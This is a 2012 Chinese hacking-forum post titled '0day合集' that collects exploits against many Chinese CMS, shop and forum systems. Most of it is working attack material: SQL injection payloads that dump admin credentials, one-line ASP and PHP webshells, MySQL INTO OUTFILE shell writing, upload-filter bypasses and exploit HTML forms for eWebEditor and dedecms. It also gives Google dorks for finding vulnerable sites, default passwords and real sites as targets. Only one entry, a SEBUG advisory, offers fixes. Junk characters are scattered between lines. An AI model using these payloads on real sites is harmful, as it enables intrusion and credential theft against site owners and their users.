中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
( p1 e/ w, }6 F0 S0 h. u; W, p
* b0 S' P$ |$ Z. M6 M7 \7 _8 V1 F
直接上exploit:
$ p! e- _9 U* X+ C1 g9 b
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
( H" j2 q8 E( l7 [
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
. |* C1 C' o4 I8 z2 A& {* W
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 `! o' Z5 x) f! \/ u* ]+ P8 J
Asprain论坛 注册用户 上传图片就可拿到webshell
6 U/ O5 ~* C( H3 s7 T) A8 U" B4 G
+ L: Y$ u$ w/ f& w: h& M1 J2 B
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
2 T9 X6 R# d; K# h% g; y) w- j
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
4 D+ z6 X; S. [# h: i
2.gif 为一小图片文件,一定要小,比如qq表情图片
9 J. y* y% N; B7 L
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
7 r" u- d1 O. g* [3 h/ n9 w
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
7 F/ h. n" A7 Q3 L8 _7 G6 z
5.q.asp;.gif
; j! Q5 @" w6 J, w' z6 h" t: g7 w
google:Powered by Asprain
9 z0 o$ _ g/ u2 M" L( |4 Z* O5 L0 K _# V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# m1 P7 f% F% c/ L8 u5 i
7 L# r) u/ q" h; a! ~# V
ShopNum1全部系统存在上传漏洞。
; P3 S; v3 ~( l7 Y: R8 N
: U* t) l% U( ]! f6 r
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
0 A* c* ?, b9 P, a _
按说明 提示登录后台。。
C4 J2 E0 ^5 Y& C) h9 E
在后台功能页面->附件管理->附件列表
, x. H9 e0 `3 \4 D- I: t
可以直接上传.aspx 后缀木马
- H5 o% u X7 s) S
http://demo.shopnum1.com/upload/20110720083822500.aspx
/ _8 J" z. j R' j
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% S' U0 e+ P* C; j
2 b8 `3 o* z( }. Z
牛牛CMS中小企业网站管理系统 上传漏洞
4 F N( H! a' N C; `3 x% T
- w) R% D8 G- Y, L6 M* }
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
! s2 n5 m# ^1 b. v4 B( N! m- O# v
后台:admin/login.asp
' W/ F% Y2 Y, u4 E ~
ewebeditor 5.5 Nday
6 J7 a) x) X4 y, \% e3 Y
exp:
5 z' t8 v1 }- N5 j0 Q
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
; K/ W! T' G' w3 V6 \5 l6 m
<input?type=file?name=uploadfile?size=100><br><br>?
0 c6 F# t) Y/ g5 u' l, W8 K e
<input?type=submit?value=upload>?
# i+ W/ t" M- S& q
</form>
' n1 c+ Q, ?, I& Z f0 n
ps:先上传小马.
' \6 s, i/ u0 X+ U1 T5 e( b
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
8 c$ y9 E- s7 u
7 S& g' [- u( n( p& i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, L3 C. X( ?, a/ d+ h
" w3 b* N" W8 Z
YothCMS 遍历目录漏洞
/ c' ]2 @9 ~# d8 m# ~% s" W
' D) @- ]3 p5 v5 R( P
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
6 A6 V" _+ y! T% _& _0 a6 Q% ^
默认后台:admin/login.asp
+ I! J m0 ]5 {3 o$ u' F$ x/ V9 }
遍历目录:
- w& j% m: Q5 m- U
ewebeditor/manage/upload.asp?id=1&dir=../
9 N, \9 C, {# Y; ]8 ^. v
data:
$ T! d! s5 u; h; n
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
3 w; \4 ]% G" Z3 y. \. H, W: s
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 r/ I5 a4 C, h3 X2 b; S6 `
0 ^' o9 Z, f ~) K
Net112企业建站系统 1.0
' V) s9 a+ i; u& i. |$ Y
8 S% }2 D3 G# G' d
源码简介:
, @6 {0 W; |: b2 H
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
! z4 K- I' p( p9 H
添加管理员:
; Q* V- \8 p& x/ G8 o; R
http://www.0855.tv/admin/admin.asp?action=add&level=2
8 H/ u" M$ k* Q% \0 n- r
其实加不加都不是很重要,后台文件都没怎么作验证。
% Y( k$ @- X2 q7 h( R q
上传路径:
, f0 F5 Z/ s- D1 h N
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
7 v: R6 e6 k' p; d: Z5 {& \& A6 B; ?
http://www.0855.tv/inc/Upfile.asp?Stype=2
2 r' a7 `* t9 _" U8 E* e; N
怎么利用自己研究。
2 B: e$ v6 W+ A- e
遍历目录:
$ |/ k- X, z7 L& G4 {$ p( F
http://www.0855.tv/admin/upfile.asp?path=../..
0 N/ y0 a! B5 K% d5 z# u! ^6 Q; q* F
如:
# c6 s' d( U) z W) q8 U& O
http://www.0855.tv/admin/upfile.asp?path=../admin
1 O+ h" i8 @4 p; o
http://www.0855.tv/admin/upfile.asp?path=../data
! g, c' C# t. w
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 ?! w# R) G& J, ~0 [
7 G* [, c; M1 ?0 d4 ^* ]1 s4 O
易和阳光购物商城通杀 上传漏洞
( n- e; `) x6 J6 E3 N
% p$ ~; K4 L n& t2 E9 A$ @
前提要求是IIS6.0+asp坏境。
: e( R3 l! @: Z9 Q: R0 W
漏洞文件Iheeo_upfile.asp
4 F" M% y. i; t: m" _$ a
过滤不严.直接可以iis6.0上传
* p6 J& }* L- q) y
把ASP木马改成0855.asp;1.gif
: a# {. \4 G' B& r3 i
直接放到明小子上传
0 j7 y6 J! R6 ~, i) ]4 I
Google搜索:inurl:product.asp?Iheeoid=
- |8 L# _7 i; I& t1 ^, s7 Z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 n; n5 K, ]3 K8 y
; |: O, D& M) C U+ _+ P
phpmyadmin后台4种拿shell方法
) O) S" s. D3 i" h8 Z2 Z7 b' w" d' B
8 [: |( {+ D+ s2 F' j4 z
方法一:
; H7 C3 N3 S" Q- d5 d! [2 j
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
; P% x/ A, m: l$ o
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
, L4 c W) v ^; n' M/ K/ |
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
C& {% O& J( Q& B' N
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
+ C& k7 Y$ q- s: O3 D. C' t
一句话连接密码:xiaoma
$ A5 ?* ]3 K5 J6 A
方法二:
$ R+ j z8 L6 v5 s* V
Create TABLE xiaoma (xiaoma1 text NOT NULL);
/ n, g- ]1 x7 u* p9 b) I
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
' j, A: N4 U; G9 R
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
* O/ K) G/ M: m9 {# a
Drop TABLE IF EXISTS xiaoma;
1 } q2 E0 J' T! D: B
方法三:
% [4 ^* b. `8 E
读取文件内容: select load_file('E:/xamp/www/s.php');
4 X; h: }% H6 S0 N
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
# N- i- P7 I, m6 R# M: f) z9 j
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
' L. M+ R3 E- E. Q+ ?+ n
方法四:
3 `4 [& s3 f5 }: I9 T
select load_file('E:/xamp/www/xiaoma.php');
3 d9 E! {9 A( s9 l
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
% J, j( {3 L. Q. E" ?* r
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
% F2 g8 b1 e1 S" i' k" _" F
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" l$ T4 ^0 u) X# h1 J7 |- \
* @9 ~2 i1 F$ E9 r0 H
传信网络独立开发网站源码0day漏洞
% t- `2 b. o& b% |( A- q$ S
5 F& t5 _3 H6 ?4 ^1 F( q0 n
后台system/login.asp
" H1 g2 _6 ^) q7 K0 ~0 [
进了后台有个ewebeditor
% S4 f& X0 ^3 V+ D8 O
Google 搜索inurl:product1.asp?tyc=
' p# A, Y1 j4 r+ K
编辑器漏洞默认后台ubbcode/admin_login.asp
0 K' g* D8 O: b$ T) |0 O
数据库ubbcode/db/ewebeditor.mdb
9 Q' u0 I3 T( Y8 R+ ?- q2 M/ C3 _, b
默认账号密码yzm 111111
o' ~& |3 I R* _
" A! U& I9 S0 F5 {3 f1 T
拿webshell方法
5 }+ W* f7 P1 J: ^1 M/ \4 T
登陆后台点击“样式管理”-选择新增样式
e$ t: G% B6 B# a4 T
样式名称:scriptkiddies 随便写
4 S* \, w$ B% o& c$ | U; t7 a' y
路径模式:选择绝对路径
/ n1 U" M1 J) z% h
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
# A( G1 L5 y' \* y, }
图片类型比如就是我们要上传的ASP木马格式
4 ~* M3 D4 i* }3 q$ s: E4 V
上传路径:/
: E6 |7 c: S& y% P* @/ X* O1 T# W
图片限制:写上1000 免的上不了我们的asp木马
5 T0 ?" n3 T: {1 P: |$ g0 N
上传内容不要写
}" F8 d7 s$ P
可以提交了
& f0 v9 R) H3 q& R
样式增加成功!
2 j" m9 { H" W3 M# ]% v4 f; f
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
( r- H; o( b0 K2 y/ ]% O# m8 S
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
' j+ q4 I' g$ y6 l) J
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
+ I: ~, Z% V H; C" y
上ASP木马 回车 等到路径
1 Y2 r8 y) n( `3 `4 [
4 v. V# F1 ~0 o2 W& U
后台:system/login.asp
4 |1 C+ {, z7 H/ H/ I: p$ U" m
Exp:
V' k, A6 E+ w z. T) @1 b8 B
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
. t/ }* }* U# ^9 g
测试:
6 X0 W; `, ]" p( L
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
2 ]1 G! e9 f; W0 f7 P
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
& J2 d! c7 z5 ^, ]
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( T' _/ q% a6 g+ K
9 X# G! m2 `% I( X$ M" {2 s3 v- N
foosun 0day 最新注入漏洞
8 g9 ]( c- {5 \- @& I& A
% {+ v) y& d9 c# q6 v9 _
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
, @' X6 [' t- w9 }9 C
利用简单的方法:
; \7 b& Z. r/ J4 x% Y# @
暴管理员帐号:
* V0 |7 K( C3 u1 a- P1 U
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
6 T3 S5 ~9 N! }, z: g
暴管理员密码:
1 [7 R! }0 u8 S* q0 g& P4 s
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
/ [2 i$ ~( Y$ O9 m' q% J
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 r5 @/ l$ B# @$ V P$ M
; l8 l- z8 ~# d- ~2 }9 }
网站程序的版权未知!
% O/ I5 t; T# E, f1 i
( s3 Q. _% A8 Y$ S7 X
默认网站数据库:
+ G& } e8 k* }! h* C3 t E
www.i0day.com/data/nxnews.mdb
/ d" E3 |8 v' y$ t6 Z
ewebeditor 在线编辑器:
3 Q9 E2 ^" A. |8 F# [- E
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
& R5 Q# {* b: a. N
登录地址:ewebeditor/admin_login.asp
* z M# {; q r
默认密码:admin admin
) p+ d% d9 ~* J) @/ @( Z3 J5 D% o
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
# G" w; i" d( b K
1 U% ?9 L: g8 l; g5 D% k6 d/ y& V
Sql注入漏洞:
3 Q: [3 l: R, D' O4 B
http://www.i0day.com/detail.asp?id=12
- E `( \: t( R4 C" S5 ^6 @
exp:
, q' e7 l" n9 [3 U0 L; L* Z5 f
union select 1,admin,password,4,5,6,7,8 from admin
/ C' J$ U9 O3 r% _3 E* Y. r$ n
爆出明文帐号/密码
/ \7 f+ S r: D( e7 U% O
" k4 r' `0 y( L2 c1 {
上传漏洞:
% q; _- v6 K5 q! s0 y
后台+upfile.asp
3 x9 E! R% c) m2 f' r
如:
+ ?! q$ V8 o& K2 B! a
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
7 j1 q9 [' p' \) a3 V: o
shell的地址:网址+后台+成功上传的马
, Q) Z2 `* ~3 o3 {4 }3 {! M
google:inurl:news.asp?lanmuName=
( o: x) F2 H! y0 z" u& K. `
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 E4 {, K1 R c9 W: R
! z* Q& ^- n4 G6 c" y$ \
dedecms最新0day利用不进后台直接拿WEBSHELL
: Q9 u1 H/ z: E* y2 ]
- Z; B4 ]5 I9 \( b, p% @+ X% u
拿webshell的方法如下:
- f* P# a" p, s& g: s( T, y
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
0 K4 q0 N5 f; y
前题条件,必须准备好自己的dede数据库,然后插入数据:
3 v6 s1 s& d& l
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
3 Z, D7 w& K) V8 u8 h$ R
4 \1 s" E% Q4 u% C9 d7 t, a
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
7 W' V5 C4 l0 a1 y# r. A
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
* T: d1 Z" H5 u
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
$ n' H2 {6 a( {
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
( g* R! }' f* `% a
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
) `) N3 L( D3 C& g
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
5 p% K+ d! M+ a% B+ Q; k% |
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
% B. W- `' m- u3 R6 V; U& i* ]/ ^; D$ D
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
- M+ I" [$ A- A2 B5 u3 z8 d* i
<input type="text" value="true" name="nocache" style="width:400">
1 F; J: v C) a/ g. I6 S9 S
<input type="submit" value="提交" name="QuickSearchBtn"><br />
9 l, s( n; ?' J% I) e" Q9 p4 B2 T
</form>
) G/ I) I5 v: C$ [
<script>
: c. T7 m8 ?6 R0 o6 P" K4 R/ d
function addaction()
9 P+ p( \1 _5 D. U9 S L
{
2 y7 j5 s+ z9 ^
document.QuickSearch.action=document.QuickSearch.doaction.value;
- R: w+ F, Y. R
}
2 l- k- _/ Y# h8 x
</script>
" i4 s' k' g& l4 A# j
-----------------------------------------------------------------------------------------------------------------------------------------------
9 m8 e6 @1 ~/ E1 g
$ y4 h* @3 a8 }& s( R' S
dedecms织梦暴最新严重0day漏洞
9 |" w; t r2 w" v
bug被利用步骤如下:
! I5 {, J9 p9 S
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
2 Q7 [3 {) j% L
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
3 g% v9 l6 L2 F' f3 ]* ]/ S
-------------------------------------------------------------------------------------------------------------------------------------------
! c) u1 y5 z" P* y, S& X
) H, b1 b/ r4 d! _6 [
多多淘宝客程序上传漏洞
( x8 } d5 k4 j' Y: M) u
漏洞页面:
' n/ z' J- w# k. r
admin\upload_pic.php
, C# i& V( v6 P4 v G
传送门:
, k4 c& P3 z: ^/ n
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
& Y. j0 s6 _4 y& D: U: X4 T% v9 F
PS:copy张图片马 直接 xxx.php 上传抓包地址!
/ D4 S* |' O. l( v
------------------------------------------------------------------------------------------------------------------------------------------------------
9 ^7 ?- y0 L R5 v
" y3 B: J% r% u7 E* {" D+ h9 P
无忧公司系统ASP专业版后台上传漏洞
. E! C+ r+ K' g" Q) A- w
漏洞文件 后台上传
" s% a. e# f% Y
admin/uploadPic.asp
8 f4 z% f) P3 t0 c6 a( f
漏洞利用 这个漏洞好像是雷池的
" n$ U% j- ]& ? U5 H( L2 h
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
; V: _- }6 n6 r! ]1 u( o
等到的webshell路径:
! l+ d, A4 B* R' @; ~0 a% G
/UploadFiles/scriptkiddies.asp;_2.gif
0 `2 B3 G& i' N) j" A6 f7 S% L* j
---------------------------------------------------------------------------------------------------------------------------------------------------
, y8 l' Y, ~2 U! c
. T: u4 b2 k3 A5 P1 [, M& z6 y
住哪酒店分销联盟系统2010
9 ^2 y, [4 P+ b8 d J5 R! V
Search:
/ N8 Z9 X. ^6 B
inurl:index.php?m=hotelinfo
9 h* z0 o x5 s! ~, }
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
% |" ^! M5 O& f1 T5 \0 w
默认后台:index.php?m=admin/login
# i& O( O8 N$ f. x8 V# b- V5 Z0 Q
--------------------------------------------------------------------------------------------------------------------------------------------------
1 ]( X+ e7 v- ]' ]6 A/ v: K3 Q* P$ M
3 U9 }! r; j! T1 \8 |9 f' G4 R
inurl:info_Print.asp?ArticleID=
* \) T, V/ |0 l4 X
后台 ad_login.asp
! v& z, Z3 M+ s9 M
爆管理员密码:
# j% Z- c4 u* z; x% f7 {- m# S; S
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
$ r1 b; g! A" d+ i
------------------------------------------------------------------------------------------------------------------------------------------------------------
# _, O! i( T, j: p
6 \2 R* [- |7 J8 i7 ^
搜索框漏洞!
o- k9 j; M6 Z- b: `! ~
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
+ w+ R( U( Z3 j8 m- e t" C; v. z! Q2 X
--------------------------------------------------------------------------------------------------------------------------------------------------------
. K* r9 x' v) k6 j' Q3 {
! l) v( [& l7 L# H
关键字:
" x) z9 m# f, n! u$ ?
inurl:/reg_TemletSel.asp?step=2
9 ~5 U6 m; {- G' b- f% ]
或者
& Y" o% `4 A; L7 W# ^
电子商务自助建站--您理想的助手
; W9 @3 M: f& {2 m/ m/ y3 l
-------------------------------------------------------------------------------------------------------------------------------------------------
! t0 L0 E& B9 {- V
1 R5 U9 `( e+ n, d, c
iGiveTest 2.1.0注入漏洞
, g% V" i$ ?& _. T. B) b
Version: <= 2.1.0
. h J( v9 u) E% M5 l2 O
# Homepage:
http://iGiveTest.com/
" ?3 L. k; U6 A7 I0 Y, V9 _
谷歌关键字: “Powered by iGiveTest”
( Z- ^) C7 w+ N
随便注册一个帐号。然后暴管理员帐号和密码
0 k6 @$ w% ~# u( I9 ?" n ]9 W9 t! {8 Y
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
" J: I% h# Y$ y5 Q4 }9 D5 |
------------------------------------------------------------------------------------------------------------------------------------------------
6 `. r2 x* w0 k$ u. f
% [8 U* I- w+ t0 T) _( e
CKXP网上书店注入漏洞
/ s8 G+ K* j* m( t+ ~) G' b4 p0 {
工具加表:shop_admin 加字段:admin
0 f8 D7 ?0 R+ `2 H
后台:admin/login.asp
_- W. j& A0 _) `8 r
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
+ L3 p1 b3 @! I v J# q: @+ h
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
9 ]6 q3 h( V& ]
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ X* y D0 \! g: P
! b( `6 y( V$ |" z d
段富超个人网站系统留言本写马漏洞
% g9 R3 U# ^. I* [+ y7 S' ?
源码下载:
http://www.mycodes.net/24/2149.htm
& x1 h8 h! y3 y- E" {. Y, a
addgbook.asp 提交一句话。
: G6 y3 C. ^8 C. L9 I
连接:
http://www.xxxx.tv/date/date3f.asp
G* l1 @+ C5 D5 |# _
google:为防批量,特略!
) C/ B" g, T1 _( f* u. w3 [$ T
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; K! q# |6 c% V; H7 g
' {: Y* X( T# J0 z
智有道专业旅游系统v1.0 注入及列目录漏洞
0 o0 ` m( v0 ?) Q8 Q8 C; A, o5 E
默认后台路径:/admin/login.asp
+ M7 h6 W, l! ~( n. w7 r# c- h
默认管理员:admin
5 G- E5 |! o+ i# g9 v
默认密码:123456
+ q; `$ m, i0 Z& B' D( n L
SQL EXP Tset:
- Z& q& @4 p2 t" h1 _3 z
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
7 V; G6 ^! E, ` _- f9 t& q; \
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* @8 x& i9 x+ u: p' `! B. W4 p5 H
( o A! ~& p" g- O8 z8 t2 P
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
/ H5 v2 x* f/ [' w8 n
EXP:
7 ]7 h- g; m; Q. D9 A: s4 L/ }
<title>eWebeditoR3.8 for php任意文件上EXP</title>
: S! f3 B% t# y3 k& i) e7 R
<form action="" method=post enctype="multip
8 b$ P8 s8 z! P: v! f
art/form-data">
& _% W, C! ~' Z! i$ @- K. G: K
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
( c2 y9 f# e' k1 H- I1 r, F
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
2 A$ v- } z: c: l" N" Z
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
+ g$ Z" Q# y. q2 x' C9 w8 [2 g, M
file:<input type=file name="uploadfile"><br>
0 ?$ s* x- n4 H3 i* V
<input type=button value=submit onclick=fsubmit()>
5 B# H! ~7 I) Q' p1 A3 o
</form><br>
. c4 B) o5 h. D
<script>
, m1 E: I: K2 g d
function fsubmit(){
- \) V4 @& j2 l$ v
form = document.forms[0];
3 U: K% T. d9 H3 V: f
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
9 O8 r( o. v: |# X4 d- K: u0 S9 B
alert(form.action);
5 ~; n' b. H9 `
form.submit();
: E: b4 N7 ^& O( B
}
: U+ m+ m9 Q! w! O) }3 z; `
</script>
- U/ K2 U0 k9 A8 ?
注意修改里面ewebeditor的名称还有路径。
2 `- f( ?3 h) j( C
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) l* Q( u4 Q x1 `6 Z
6 l3 O4 r* S- _" f0 I4 O. }- H
提交’时提示ip被记录 防注入系统的利用
) |6 l/ C: I& e# C* I6 Z. n1 _
网址:
http://www.xxx.com/newslist.asp?id=122
′
7 j: e9 Z7 l( w1 B$ ^
提示“你的操作已被记录!”等信息。
3 O$ q5 z' p0 W- I. O
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
0 D& ~! A: z7 e6 o7 ?8 u! N
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 ^+ `9 k) B; f5 I( S8 B5 W! I
8 j J9 q2 T8 d K- _# _
西部商务网站管理系统 批量拿shell-0day
2 G5 n. F, S& H
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
J; L) B* w. P! R4 D; Z `
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
& J6 C6 ]( ^8 l" \, O! n: W
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
\' ?" U% N# Q5 L# n
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
0 C# D! y- u( B) N" R
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 c' ` k( [9 s1 Q1 W! Z# w
& v/ H1 B, C C: M4 o+ s
JspRun!6.0 论坛管理后台注入漏洞
, w' c# j& t: o& {0 l+ q
$ y. n6 N: b0 V
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
- |+ i8 @, }- A% `0 ]' r4 `& J) M
JspRun!6.0
( k+ T( y+ [" \: ~4 {. \
漏洞描述:
1 u! Q: _: w5 i( g0 M
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
& F4 ?4 M' ]; g) }5 a! g2 q
在处理后台提交的文件中ForumManageAction.java第1940行
, c3 W' @7 N! v
String export = request.getParameter("export");//直接获取,没有安全过滤
; h7 N8 D' X7 r3 y' t9 v: ?6 [
if(export!=null){
7 W) ?* r3 `4 p8 e$ C& _: W+ m
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
0 v) C" s% E* o# a
if(styles==null||styles.size()==0){
7 ~% x) S) i. Z9 N: S6 M. |
<*参考
6 o# G' N1 P$ ^
nuanfan@gmail.com
& O: f" B7 g: s4 @2 s; w
*> SEBUG安全建议:
v# m; a) D7 O; o
www.jsprun.net
4 C% r$ k# h& m& q
(1)安全过滤变量export
) {5 L) L5 u0 P" u( [+ ?
(2)在查询语句中使用占位符
# D) ^+ G- i, |6 F
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
\# n' m; z( x7 S
8 K& Q$ M q# S: U! i
乌邦图企业网站系统 cookies 注入
. { x- M, C* T' J
1 t1 I7 G+ p$ l( e' u
程序完整登陆后台:/admin/login.asp
|* {( O7 W Y& g! N5 K3 O
默认登陆帐号:admin 密码:admin888
: o, j& B, u$ Q+ f
语句:(前面加个空格)
0 ~) s8 _6 Q% G$ `0 n
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
5 v8 O: ]2 c! ~+ s9 W/ n
或者是16个字段:
6 {9 T7 c8 e- ^# M
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
9 k7 p, v0 {: c- `3 U2 i3 B5 p
爆不出来自己猜字段。
4 e1 N) e% l3 z$ {8 i5 |
注入点:
http://www.untnt.com/shownews.asp?=88
0 _6 c+ }& M1 A! g7 v' E
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
4 C; ?7 l2 p# J N' p
关键字:
* C0 u( _% Y$ s* `" G, [
inurl:shownews?asp.id=
& n% p( I' @0 B0 d9 c$ P- t [
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! K1 J7 Q3 n# X9 y) G6 S# Z& Q
f* h! S$ v8 r% o
CKXP网上书店注入漏洞
$ L) J- \3 N. y# }
9 l* i8 S% z# B/ X8 a
工具加表:shop_admin 加字段:admin
b$ z, Q' d5 B' }& J; R
后台:admin/login.asp
, O1 \8 G! ~. D# s P# t8 t
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
/ z( o% g$ E3 b- V/ A' z
